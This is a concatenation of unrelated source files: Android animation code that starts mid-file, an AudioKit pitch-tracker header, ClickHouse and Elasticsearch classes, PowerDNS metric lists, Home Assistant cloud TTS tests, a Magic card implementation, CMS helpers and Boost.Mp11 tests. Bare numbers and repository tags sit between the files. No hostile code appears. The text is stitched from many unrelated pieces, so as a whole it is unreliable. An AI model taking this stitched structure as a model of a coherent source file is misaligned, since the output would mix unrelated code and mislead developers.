width = mTrashView.getWidth(); mTrashView.setTranslationX(mWindowWidth / 2 - width / 2); } @Override public void onComplete(int type) { trashAnimRunning = false; mTrashStatus = TRASH_SHOW; log.error("trashAppearWithAnim onComplete"); } }); anim.start(); } public void trashDisappearWithAnim(final Runnable callback) { if (mTrashStatus == TRASH_HIDE) { return; } if (trashAnimRunning) { log.error("trashDisappearWithAnim return by trashDisappearAnimRunning true"); return; } Vector3f from = new Vector3f(0, mTrashView.getTranslationY()); Vector3f to = new Vector3f(0, mWindowHeight); int time = 200; AnimTimeLine timeLine = new AnimTimeLine(); if (mTrashForegroundView.getVisibility() == View.VISIBLE) { Anim anim = new Anim(mTrashForegroundView, Anim.TRANSLATE, time, Anim.CUBIC_OUT, from, to); anim.setListener(new AnimListener() { @Override public void onStart() { } @Override public void onComplete(int type) { mTrashForegroundView.setVisibility(View.GONE); } }); timeLine.addAnim(anim); } Anim anim = new Anim(mTrashView, Anim.TRANSLATE, time, Anim.CUBIC_OUT, from, to); timeLine.setAnimListener(new AnimListener() { @Override public void onStart() { trashAnimRunning = true; } @Override public void onComplete(int type) { trashAnimRunning = false; mTrashStatus = TRASH_HIDE; if (callback != null) { callback.run(); } } }); timeLine.addAnim(anim); if (!timeLine.start()) { trashAnimRunning = false; mTrashStatus = TRASH_HIDE; if (callback != null) { callback.run(); } } } private boolean mTrashUpAnimRunning = false; private boolean mTrashDownAnimRunning = false; public void trashFloatUpWithAnim(final Runnable runnable) { if (mTrashStatus == TRASH_FLOAT) { return; } if (mTrashUpAnimRunning) { log.error("trashFloatUpWithAnim return by mTrashUpAnimRunning true"); return; } mTrashUpAnimRunning = true; int fromY = (int) mTrashView.getY(); int toY = mWindowHeight - mTrashDisplayHeight - mTrashFloatUpHeight; Vector3f from = new Vector3f(0, fromY); Vector3f to = new Vector3f(0, toY); Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 100, Anim.CUBIC_OUT, from, to); anim.setListener(new AnimListener() { @Override public void onStart() { } @Override public void onComplete(int type) { mTrashStatus = TRASH_FLOAT; mTrashUpAnimRunning = false; if (runnable != null) { runnable.run(); } } }); anim.start(); } public void trashFallDownWithAnim() { if (mTrashStatus != TRASH_FLOAT) { return; } if (mTrashDownAnimRunning) { log.error("trashFallDownWithAnim return by mTrashDownAnimRunning true"); return; } mTrashDownAnimRunning = true; Vector3f from = new Vector3f(0, mTrashView.getY()); Vector3f to = new Vector3f(0, mWindowHeight - mTrashDisplayHeight); Anim anim = new Anim(mTrashView, Anim.TRANSLATE, 100, Anim.CUBIC_OUT, from, to); anim.setListener(new AnimListener() { @Override public void onStart() { } @Override public void onComplete(int type) { mTrashDownAnimRunning = false; mTrashStatus = TRASH_SHOW; } }); anim.start(); } public void moveIconToTrash(final SidebarRootView.DragView dragView) { View view = dragView.mView; if (view == null) { return; } dragView.setBubbleVisibleStatus(View.INVISIBLE); int viewWidth = view.getWidth(); int viewHeight = view.getHeight(); float fromX = view.getX(); float fromY = view.getY(); float toX = mWindowWidth / 2 - viewWidth / 2; float toY = mWindowHeight - mTrashDisplayHeight - mTrashFloatUpHeight - viewHeight; Vector3f from = new Vector3f(fromX, fromY); Vector3f to = new Vector3f(toX, toY); Anim anim = new Anim(view, Anim.TRANSLATE, 200, Anim.CUBIC_OUT, from, to); anim.setListener(new AnimListener() { @Override public void onStart() { } @Override public void onComplete(int type) { if (mTrashStatus != TRASH_FLOAT) { Runnable runnable = new Runnable() { @Override public void run() { rockOnTrash(dragView.mView); } }; trashFloatUpWithAnim(runnable); } else { rockOnTrash(dragView.mView); } } }); anim.start(); } private boolean rockRepeat = false; private AnimatorSet mRockAnimSet; public void rockOnTrash(View view) { if (mRockAnimSet != null) { mRockAnimSet = null; } float rockAngle = 2.0f; float offset = 2.0f; float locX = view.getX(); float locY = view.getY(); //init view loc and rotate rockRepeat = true; view.setTranslationX(locX - offset); view.setTranslationY(locY + offset); view.setRotation(-rockAngle); Vector3f loc = new Vector3f(locX, locY); mRockAnimSet = generateRockAnimSet(view, loc); RockAnimListener listener = new RockAnimListener(view, loc); mRockAnimSet.addListener(listener); mRockAnimSet.start(); } public void stopRock() { rockRepeat = false; if (mRockAnimSet != null) { if (mRockAnimSet.isStarted()) { if (mRockAnimSet.isRunning()) { mRockAnimSet.end(); } else { mRockAnimSet.cancel(); } } } // } private class RockAnimListener implements Animator.AnimatorListener { private View mView; private Vector3f mLoc; public RockAnimListener(View view, Vector3f loc) { mView = view; mLoc = loc; } @Override public void onAnimationStart(Animator animator) { } @Override public void onAnimationEnd(Animator animator) { if (rockRepeat) { mRockAnimSet = generateRockAnimSet(mView, mLoc); RockAnimListener listener = new RockAnimListener(mView, mLoc); mRockAnimSet.addListener(listener); mRockAnimSet.start(); } } @Override public void onAnimationCancel(Animator animator) { } @Override public void onAnimationRepeat(Animator animator) { } } private AnimatorSet generateRockAnimSet(View view, Vector3f loc) { float rockAngle = 2.0f; float offset = 2.0f; long interval_time = 70; AnimInterpolator.Interpolator interpolator = new AnimInterpolator.Interpolator(Anim.CIRC_IN_OUT); AnimatorSet animSet = new AnimatorSet(); //step 1 ObjectAnimator anim1_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x - offset, loc.x + offset); anim1_translateX.setDuration(interval_time); anim1_translateX.setInterpolator(interpolator); ObjectAnimator anim1_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y + offset, loc.y - offset); anim1_translateY.setDuration(interval_time); anim1_translateY.setInterpolator(interpolator); animSet.play(anim1_translateX).with(anim1_translateY); //step 2 ObjectAnimator anim2_rotate = ObjectAnimator.ofFloat(view, Anim.ROTATION, -rockAngle, rockAngle); anim2_rotate.setDuration(interval_time); anim2_rotate.setInterpolator(interpolator); ObjectAnimator anim2_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x + offset, loc.x + offset); anim2_translateX.setDuration(interval_time); anim2_translateX.setInterpolator(interpolator); ObjectAnimator anim2_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y - offset, loc.y + offset); anim2_translateY.setDuration(interval_time); anim2_translateY.setInterpolator(interpolator); animSet.play(anim2_rotate).with(anim2_translateX).with(anim2_translateY).after(anim1_translateX); //step 3 ObjectAnimator anim3_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x + offset, loc.x - offset); anim3_translateX.setDuration(interval_time); anim3_translateX.setInterpolator(interpolator); ObjectAnimator anim3_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y + offset, loc.y - offset); anim3_translateY.setDuration(interval_time); anim3_translateY.setInterpolator(interpolator); animSet.play(anim3_translateX).with(anim3_translateY).after(anim2_rotate); //step 4 ObjectAnimator anim4_rotate = ObjectAnimator.ofFloat(view, Anim.ROTATION, rockAngle, -rockAngle); anim4_rotate.setDuration(interval_time); anim4_rotate.setInterpolator(interpolator); ObjectAnimator anim4_translateX = ObjectAnimator.ofFloat(view, Anim.X, loc.x - offset, loc.x - offset); anim4_translateX.setDuration(interval_time); anim4_translateX.setInterpolator(interpolator); ObjectAnimator anim4_translateY = ObjectAnimator.ofFloat(view, Anim.Y, loc.y - offset, loc.y + offset); anim4_translateY.setDuration(interval_time); anim4_translateY.setInterpolator(interpolator); animSet.play(anim4_rotate).with(anim4_translateX).with(anim4_translateY).after(anim3_translateX); return animSet; } }
7,647
395
// Copyright AudioKit. All Rights Reserved. Revision History at http://github.com/AudioKit/AudioKit/ #pragma once #ifdef __cplusplus #define ZT_API extern "C" #else #define ZT_API #endif typedef struct PitchTracker *PitchTrackerRef; ZT_API PitchTrackerRef ztPitchTrackerCreate(unsigned int sampleRate, int hopSize, int peakCount); ZT_API void ztPitchTrackerDestroy(PitchTrackerRef); ZT_API void ztPitchTrackerAnalyze(PitchTrackerRef tracker, float* frames, unsigned int count); ZT_API void ztPitchTrackerGetResults(PitchTrackerRef tracker, float* trackedAmplitude, float* trackedFrequency);
189
15,577
<gh_stars>1000+ #include <Core/SortDescription.h> #include <Core/Block.h> #include <IO/Operators.h> #include <Common/JSONBuilder.h> namespace DB { void dumpSortDescription(const SortDescription & description, const Block & header, WriteBuffer & out) { bool first = true; for (const auto & desc : description) { if (!first) out << ", "; first = false; if (!desc.column_name.empty()) out << desc.column_name; else { if (desc.column_number < header.columns()) out << header.getByPosition(desc.column_number).name; else out << "?"; out << " (pos " << desc.column_number << ")"; } if (desc.direction > 0) out << " ASC"; else out << " DESC"; if (desc.with_fill) out << " WITH FILL"; } } void SortColumnDescription::explain(JSONBuilder::JSONMap & map, const Block & header) const { if (!column_name.empty()) map.add("Column", column_name); else { if (column_number < header.columns()) map.add("Column", header.getByPosition(column_number).name); map.add("Position", column_number); } map.add("Ascending", direction > 0); map.add("With Fill", with_fill); } std::string dumpSortDescription(const SortDescription & description) { WriteBufferFromOwnString wb; dumpSortDescription(description, Block{}, wb); return wb.str(); } JSONBuilder::ItemPtr explainSortDescription(const SortDescription & description, const Block & header) { auto json_array = std::make_unique<JSONBuilder::JSONArray>(); for (const auto & descr : description) { auto json_map = std::make_unique<JSONBuilder::JSONMap>(); descr.explain(*json_map, header); json_array->add(std::move(json_map)); } return json_array; } }
817
1,125
<reponame>ZenMX/elasticsearch /* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.index.reindex; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.util.concurrent.AtomicArray; import java.util.ArrayList; import java.util.Arrays; import java.util.List; import java.util.concurrent.atomic.AtomicInteger; import static java.util.Collections.unmodifiableList; /** * Tracks the state of sliced subtasks and provides unified status information for a sliced BulkByScrollRequest. */ public class LeaderBulkByScrollTaskState { private final BulkByScrollTask task; private final int slices; /** * Holds the responses of slice workers as they come in */ private final AtomicArray<Result> results; /** * How many subtasks are still running */ private final AtomicInteger runningSubtasks; public LeaderBulkByScrollTaskState(BulkByScrollTask task, int slices) { this.task = task; this.slices = slices; results = new AtomicArray<>(slices); runningSubtasks = new AtomicInteger(slices); } /** * Returns the number of slices this BulkByScrollRequest will use */ public int getSlices() { return slices; } /** * Get the combined statuses of slice subtasks, merged with the given list of statuses */ public BulkByScrollTask.Status getStatus(List<BulkByScrollTask.StatusOrException> statuses) { // We only have access to the statuses of requests that have finished so we return them if (statuses.size() != results.length()) { throw new IllegalArgumentException("Given number of statuses does not match amount of expected results"); } addResultsToList(statuses); return new BulkByScrollTask.Status(unmodifiableList(statuses), task.getReasonCancelled()); } /** * Get the combined statuses of sliced subtasks */ public BulkByScrollTask.Status getStatus() { return getStatus(Arrays.asList(new BulkByScrollTask.StatusOrException[results.length()])); } /** * The number of sliced subtasks that are still running */ public int runningSliceSubTasks() { return runningSubtasks.get(); } private void addResultsToList(List<BulkByScrollTask.StatusOrException> sliceStatuses) { for (Result t : results.asList()) { if (t.response != null) { sliceStatuses.set(t.sliceId, new BulkByScrollTask.StatusOrException(t.response.getStatus())); } else { sliceStatuses.set(t.sliceId, new BulkByScrollTask.StatusOrException(t.failure)); } } } /** * Record a response from a slice and respond to the listener if the request is finished. */ public void onSliceResponse(ActionListener<BulkByScrollResponse> listener, int sliceId, BulkByScrollResponse response) { results.setOnce(sliceId, new Result(sliceId, response)); /* If the request isn't finished we could automatically rethrottle the sub-requests here but we would only want to do that if we * were fairly sure they had a while left to go. */ recordSliceCompletionAndRespondIfAllDone(listener); } /** * Record a failure from a slice and respond to the listener if the request is finished. */ public void onSliceFailure(ActionListener<BulkByScrollResponse> listener, int sliceId, Exception e) { results.setOnce(sliceId, new Result(sliceId, e)); recordSliceCompletionAndRespondIfAllDone(listener); // TODO cancel when a slice fails? } private void recordSliceCompletionAndRespondIfAllDone(ActionListener<BulkByScrollResponse> listener) { if (runningSubtasks.decrementAndGet() != 0) { return; } List<BulkByScrollResponse> responses = new ArrayList<>(results.length()); Exception exception = null; for (Result t : results.asList()) { if (t.response == null) { assert t.failure != null : "exception shouldn't be null if value is null"; if (exception == null) { exception = t.failure; } else { exception.addSuppressed(t.failure); } } else { assert t.failure == null : "exception should be null if response is not null"; responses.add(t.response); } } if (exception == null) { listener.onResponse(new BulkByScrollResponse(responses, task.getReasonCancelled())); } else { listener.onFailure(exception); } } private static final class Result { final BulkByScrollResponse response; final int sliceId; final Exception failure; private Result(int sliceId, BulkByScrollResponse response) { this.sliceId = sliceId; this.response = response; failure = null; } private Result(int sliceId, Exception failure) { this.sliceId = sliceId; this.failure = failure; response = null; } } }
2,184
313
<gh_stars>100-1000 package com.imperva.apispecparser.parsers.swagger.property; public interface AuthenticationProperties { String getName(); ApiKeyAuthenticationParamType getIn(); }
65
6,663
<gh_stars>1000+ int e = d+1;
15
1,301
<filename>tests/integration_tests/src/all_switch.c /* TAGS: min c */ /* LIFT_OPTS: explicit +--explicit_args +--explicit_args_count 8 */ /* LIFT_OPTS: default */ /* TEST: 12 */ /* TEST: 15 */ /* * Copyright (c) 2018 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <stdio.h> #include <stdlib.h> int main(int argc, const char *argv[]) { if(argc < 2) { return -1; } int input = atoi(argv[1]); switch(input) { case 0: printf("Input was zero\n"); break; case 1: printf("Input was one\n"); break; case 2: printf("Input was two\n"); break; case 4: printf("Input was four\n"); break; case 6: printf("Input was six\n"); break; case 12: printf("Input was twelve\n"); break; case 13: printf("Input was thirteen\n"); break; case 19: printf("Input was nineteen\n"); break; case 255: printf("Input was two hundred fifty-five\n"); break; case 0x12389: printf("Really big input: 0x12389\n"); break; case 0x1238A: printf("Really big input: 0x1238A\n"); break; case 0x1238B: printf("Really big input: 0x1238B\n"); break; case 0x1238C: printf("Really big input: 0x1238C\n"); break; case 0x1238D: printf("Really big input: 0x1238D\n"); break; case 0x1238F: printf("Really big input: 0x1238F\n"); break; case 0x12390: printf("Really big input: 0x12390\n"); break; case 0x12391: printf("Really big input: 0x12391\n"); break; case 0x12392: printf("Really big input: 0x12392\n"); break; case 0x12393: printf("Really big input: 0x12393\n"); break; default: printf("Unknown input: %d\n", input); } return 0; }
908
590
from datetime import datetime, timedelta import random from flask_login import current_user # 0 - 1 day # 1 - 3 days # 2 - 7 days # 3 - 14 days # 4 - 30 days # 5 - 90 days # 6 - 180 days # 7 - 365 days def get_time_delta(tier): if tier == 0: time = timedelta(days=1) if tier == 1: time = timedelta(days=3) if tier == 2: time = timedelta(days=7) if tier == 3: time = timedelta(days=14) if tier == 4: time = timedelta(days=30) if tier == 5: time = timedelta(days=90) if tier == 6: time = timedelta(days=180) if tier == 7: time = timedelta(days=365) return time def check_for_review(highlight, tier): today = datetime.today() reviewed = highlight.review_date time = get_time_delta(tier) if today - reviewed > time: return True return False def order_highlights(highlights): tier0 = [] tier1 = [] tier2 = [] tier3 = [] tier4 = [] tier5 = [] tier6 = [] tier7 = [] #highlights = user.highlights.filter_by(archived=False).all() random.shuffle(highlights) count = current_user.review_count for h in highlights: if h.review_schedule == 0: if len(tier0) < count: if check_for_review(h, h.review_schedule): tier0.append(h) if h.review_schedule == 1: if len(tier1) < count: if check_for_review(h, h.review_schedule): tier1.append(h) if h.review_schedule == 2: if len(tier2) < count: if check_for_review(h, h.review_schedule): tier2.append(h) if h.review_schedule == 3: if len(tier3) < count: if check_for_review(h, h.review_schedule): tier3.append(h) if h.review_schedule == 4: if len(tier4) < count: if check_for_review(h, h.review_schedule): tier4.append(h) if h.review_schedule == 5: if len(tier5) < count: if check_for_review(h, h.review_schedule): tier5.append(h) if h.review_schedule == 6: if len(tier6) < count: if check_for_review(h, h.review_schedule): tier6.append(h) if h.review_schedule == 7: if len(tier7) < count: if check_for_review(h, h.review_schedule): tier7.append(h) tiers = [tier0, tier1, tier2, tier3, tier4, tier5, tier6, tier7] return tiers
1,344
663
# (C) Datadog, Inc. 2010-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) GAUGE_METRICS = [ 'cache-entries', 'concurrent-queries', 'failed-host-entries', 'negcache-entries', 'packetcache-entries', 'throttle-entries', ] RATE_METRICS = [ 'all-outqueries', 'answers-slow', 'answers0-1', 'answers1-10', 'answers10-100', 'answers100-1000', 'cache-hits', 'cache-misses', 'chain-resends', 'case-mismatches', 'client-parse-errors', 'dont-outqueries', 'ipv6-outqueries', 'ipv6-questions', 'malloc-bytes', 'noerror-answers', 'nxdomain-answers', 'max-mthread-stack', 'outgoing-timeouts', 'over-capacity-drops', 'packetcache-hits', 'packetcache-misses', 'policy-drops', 'qa-latency', 'questions', 'server-parse-errors', 'servfail-answers', 'spoof-prevents', 'sys-msec', 'tcp-client-overflow', 'tcp-clients', 'tcp-outqueries', 'tcp-questions', 'throttled-out', 'throttled-outqueries', 'unauthorized-tcp', 'unauthorized-udp', 'unexpected-packets', 'unreachables', ] GAUGE_METRICS_V4 = ['fd-usage'] RATE_METRICS_V4 = [ 'auth4-answers-slow', 'auth4-answers0-1', 'auth4-answers1-10', 'auth4-answers10-100', 'auth4-answers100-1000', 'auth6-answers-slow', 'auth6-answers0-1', 'auth6-answers1-10', 'auth6-answers10-100', 'auth6-answers100-1000', 'dlg-only-drops', 'dnssec-queries', 'dnssec-result-bogus', 'dnssec-result-indeterminate', 'dnssec-result-insecure', 'dnssec-result-nta', 'dnssec-result-secure', 'dnssec-validations', 'edns-ping-matches', 'edns-ping-mismatches', 'ignored-packets', 'no-packet-error', 'noedns-outqueries', 'noping-outqueries', 'nsset-invalidations', 'nsspeeds-entries', 'outgoing4-timeouts', 'outgoing6-timeouts', 'policy-result-custom', 'policy-result-drop', 'policy-result-noaction', 'policy-result-nodata', 'policy-result-nxdomain', 'policy-result-truncate', 'real-memory-usage', 'resource-limits', 'too-old-drops', 'udp-in-errors', 'udp-noport-errors', 'udp-recvbuf-errors', 'udp-sndbuf-errors', 'uptime', 'user-msec', ] METRIC_FORMAT = 'powerdns.recursor.{}'
1,166
852
from __future__ import print_function import FWCore.ParameterSet.SequenceTypes as sqt import FWCore.ParameterSet.Config as cms import FWCore.ParameterSet.Modules as mod def getModulesFromSequence(sequence,list): item = sequence._seq if isinstance(item,mod._Module): list.append(item) elif isinstance(item,cms.Sequence): getModulesFromSequence(item,list) else: _getModulesFromOp(item,list) def _getModulesFromOp(op,list): for item in dir(op): o = getattr(op,item) if isinstance(o,mod._Module): list.append(o) elif isinstance(o, cms.Sequence): _getModulesFromOp(o,list) elif isinstance(o,sqt._Sequenceable): _getModulesFromOp(o,list) def extractUsedOutputs(process): allEndPathModules = [] for name in process._Process__endpaths: endpath = getattr(process,name) list = [] getModulesFromSequence(endpath,list) allEndPathModules.extend(list) allUsedOutputModules = [] for module in allEndPathModules: if isinstance(module, cms.OutputModule): allUsedOutputModules.append(module) return allUsedOutputModules if __name__ == "__main__": import unittest class TestPrintPath(unittest.TestCase): def testGetModules(self): p=cms.Process("Test") p.foo = cms.EDProducer("Foo") p.p = cms.Path(p.foo) list = [] getModulesFromSequence(p.p,list) print(len(list)) p=cms.Process("Test") p.foo = cms.OutputModule("Foo") p.bar = cms.OutputModule("Bar") p.unused = cms.OutputModule("Unused") p.p = cms.EndPath(p.foo*p.bar) usedOutputs = extractUsedOutputs(p) print(len(usedOutputs)) p=cms.Process("Test") p.foo = cms.EDProducer("Foo") p.bar = cms.EDProducer("Bar") p.s = cms.Sequence(p.foo*p.bar) p.fii = cms.EDProducer("Fii") p.p = cms.Path(p.s*p.fii) list = [] getModulesFromSequence(p.p,list) print(len(list)) unittest.main()
1,180
348
<gh_stars>100-1000 {"nom":"Lessard-le-National","circ":"3ème circonscription","dpt":"Saône-et-Loire","inscrits":511,"abs":327,"votants":184,"blancs":18,"nuls":6,"exp":160,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":90},{"nuance":"LR","nom":"M. <NAME>","voix":70}]}
110
1,391
<filename>src/libndb/ndbgetval.c #include <u.h> #include <libc.h> #include <bio.h> #include "ndb.h" /* * search for a tuple that has the given 'attr=val' and also 'rattr=x'. * copy 'x' into 'buf' and return the whole tuple. * * return 0 if not found. */ char* ndbgetvalue(Ndb *db, Ndbs *s, char *attr, char *val, char *rattr, Ndbtuple **pp) { Ndbtuple *t, *nt; char *rv; Ndbs temps; if(s == nil) s = &temps; if(pp) *pp = nil; t = ndbsearch(db, s, attr, val); while(t){ /* first look on same line (closer binding) */ nt = s->t; for(;;){ if(strcmp(rattr, nt->attr) == 0){ rv = strdup(nt->val); if(pp != nil) *pp = t; else ndbfree(t); return rv; } nt = nt->line; if(nt == s->t) break; } /* search whole tuple */ for(nt = t; nt; nt = nt->entry){ if(strcmp(rattr, nt->attr) == 0){ rv = strdup(nt->val); if(pp != nil) *pp = t; else ndbfree(t); return rv; } } ndbfree(t); t = ndbsnext(s, attr, val); } return nil; } Ndbtuple* ndbgetval(Ndb *db, Ndbs *s, char *attr, char *val, char *rattr, char *buf) { Ndbtuple *t; char *p; p = ndbgetvalue(db, s, attr, val, rattr, &t); if(p == nil){ if(buf != nil) *buf = 0; } else { if(buf != nil){ strncpy(buf, p, Ndbvlen-1); buf[Ndbvlen-1] = 0; } free(p); } return t; }
722
1,444
package mage.cards.e; import java.util.UUID; import mage.MageInt; import mage.abilities.Ability; import mage.abilities.common.BeginningOfUpkeepTriggeredAbility; import mage.abilities.common.LimitedTimesPerTurnActivatedAbility; import mage.abilities.condition.common.IsStepCondition; import mage.abilities.costs.Cost; import mage.abilities.costs.common.SacrificeTargetCost; import mage.abilities.effects.OneShotEffect; import mage.abilities.effects.common.counter.AddCountersSourceEffect; import mage.abilities.effects.common.counter.RemoveCounterSourceEffect; import mage.abilities.keyword.FirstStrikeAbility; import mage.abilities.keyword.TrampleAbility; import mage.cards.CardImpl; import mage.cards.CardSetInfo; import mage.constants.*; import mage.counters.CounterType; import static mage.filter.StaticFilters.FILTER_CONTROLLED_CREATURE_SHORT_TEXT; import mage.game.Game; import mage.game.permanent.Permanent; import mage.target.common.TargetControlledCreaturePermanent; /** * * @author fireshoes */ public final class EbonPraetor extends CardImpl { public EbonPraetor(UUID ownerId, CardSetInfo setInfo) { super(ownerId, setInfo, new CardType[]{CardType.CREATURE}, "{4}{B}{B}"); this.subtype.add(SubType.AVATAR); this.subtype.add(SubType.PRAETOR); this.power = new MageInt(5); this.toughness = new MageInt(5); // First strike this.addAbility(FirstStrikeAbility.getInstance()); // Trample this.addAbility(TrampleAbility.getInstance()); // At the beginning of your upkeep, put a -2/-2 counter on Ebon Praetor. this.addAbility(new BeginningOfUpkeepTriggeredAbility(new AddCountersSourceEffect(CounterType.M2M2.createInstance()), TargetController.YOU, false)); // Sacrifice a creature: Remove a -2/-2 counter from Ebon Praetor. If the sacrificed creature was a Thrull, put a +1/+0 counter on Ebon Praetor. Activate this ability only during your upkeep and only once each turn. Ability ability = new LimitedTimesPerTurnActivatedAbility(Zone.BATTLEFIELD, new RemoveCounterSourceEffect(CounterType.M2M2.createInstance()), new SacrificeTargetCost(new TargetControlledCreaturePermanent(FILTER_CONTROLLED_CREATURE_SHORT_TEXT)), 1, new IsStepCondition(PhaseStep.UPKEEP)); ability.addEffect(new EbonPraetorEffect()); this.addAbility(ability); } private EbonPraetor(final EbonPraetor card) { super(card); } @Override public EbonPraetor copy() { return new EbonPraetor(this); } } class EbonPraetorEffect extends OneShotEffect { public EbonPraetorEffect() { super(Outcome.BoostCreature); this.staticText = "If the sacrificed creature was a Thrull, put a +1/+0 counter on {this}"; } public EbonPraetorEffect(final EbonPraetorEffect effect) { super(effect); } @Override public EbonPraetorEffect copy() { return new EbonPraetorEffect(this); } @Override public boolean apply(Game game, Ability source) { for (Cost cost : source.getCosts()) { if (cost instanceof SacrificeTargetCost) { Permanent sacrificedCreature = ((SacrificeTargetCost) cost).getPermanents().get(0); Permanent sourceCreature = game.getPermanent(source.getSourceId()); if (sacrificedCreature.hasSubtype(SubType.THRULL, game) && sourceCreature != null) { sourceCreature.addCounters(CounterType.P1P0.createInstance(), source.getControllerId(), source, game); return true; } } } return true; } }
1,373
30,023
"""Tests for cloud tts.""" from unittest.mock import Mock from hass_nabucasa import voice import pytest import voluptuous as vol from homeassistant.components.cloud import const, tts @pytest.fixture() def cloud_with_prefs(cloud_prefs): """Return a cloud mock with prefs.""" return Mock(client=Mock(prefs=cloud_prefs)) def test_default_exists(): """Test our default language exists.""" assert const.DEFAULT_TTS_DEFAULT_VOICE in voice.MAP_VOICE def test_schema(): """Test schema.""" assert "nl-NL" in tts.SUPPORT_LANGUAGES processed = tts.PLATFORM_SCHEMA({"platform": "cloud", "language": "nl-NL"}) assert processed["gender"] == "female" with pytest.raises(vol.Invalid): tts.PLATFORM_SCHEMA( {"platform": "cloud", "language": "non-existing", "gender": "female"} ) with pytest.raises(vol.Invalid): tts.PLATFORM_SCHEMA( {"platform": "cloud", "language": "nl-NL", "gender": "not-supported"} ) # Should not raise tts.PLATFORM_SCHEMA({"platform": "cloud", "language": "nl-NL", "gender": "female"}) tts.PLATFORM_SCHEMA({"platform": "cloud"}) async def test_prefs_default_voice(hass, cloud_with_prefs, cloud_prefs): """Test cloud provider uses the preferences.""" assert cloud_prefs.tts_default_voice == ("en-US", "female") provider_pref = await tts.async_get_engine( Mock(data={const.DOMAIN: cloud_with_prefs}), None, {} ) provider_conf = await tts.async_get_engine( Mock(data={const.DOMAIN: cloud_with_prefs}), {"language": "fr-FR", "gender": "female"}, None, ) assert provider_pref.default_language == "en-US" assert provider_pref.default_options == {"gender": "female"} assert provider_conf.default_language == "fr-FR" assert provider_conf.default_options == {"gender": "female"} await cloud_prefs.async_update(tts_default_voice=("nl-NL", "male")) await hass.async_block_till_done() assert provider_pref.default_language == "nl-NL" assert provider_pref.default_options == {"gender": "male"} assert provider_conf.default_language == "fr-FR" assert provider_conf.default_options == {"gender": "female"} async def test_provider_properties(cloud_with_prefs): """Test cloud provider.""" provider = await tts.async_get_engine( Mock(data={const.DOMAIN: cloud_with_prefs}), None, {} ) assert provider.supported_options == ["gender"] assert "nl-NL" in provider.supported_languages async def test_get_tts_audio(cloud_with_prefs): """Test cloud provider.""" provider = await tts.async_get_engine( Mock(data={const.DOMAIN: cloud_with_prefs}), None, {} ) assert provider.supported_options == ["gender"] assert "nl-NL" in provider.supported_languages
1,087
12,278
// Copyright 2015 <NAME>. // // Distributed under the Boost Software License, Version 1.0. // // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt #include <boost/core/lightweight_test_trait.hpp> #include <boost/mp11/list.hpp> #include <type_traits> #include <tuple> #include <utility> int main() { using boost::mp11::mp_list; using boost::mp11::mp_push_front; using L1 = mp_list<>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1>, mp_list<>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1, char[1]>, mp_list<char[1]>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L1, char[1], char[2]>, mp_list<char[1], char[2]>>)); using L2 = mp_list<void>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2>, mp_list<void>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2, char[1]>, mp_list<char[1], void>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L2, char[1], char[2]>, mp_list<char[1], char[2], void>>)); using L3 = mp_list<int[], void, float>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3>, mp_list<int[], void, float>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3, char[1]>, mp_list<char[1], int[], void, float>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L3, char[1], char[2]>, mp_list<char[1], char[2], int[], void, float>>)); using L4 = std::tuple<>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4>, std::tuple<>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4, char>, std::tuple<char>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L4, char, wchar_t>, std::tuple<char, wchar_t>>)); using L5 = std::tuple<int>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5>, std::tuple<int>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5, char>, std::tuple<char, int>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L5, char, wchar_t>, std::tuple<char, wchar_t, int>>)); using L6 = std::tuple<int, int>; BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6>, std::tuple<int, int>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6, char>, std::tuple<char, int, int>>)); BOOST_TEST_TRAIT_TRUE((std::is_same<mp_push_front<L6, char, wchar_t>, std::tuple<char, wchar_t, int, int>>)); return boost::report_errors(); }
1,142
674
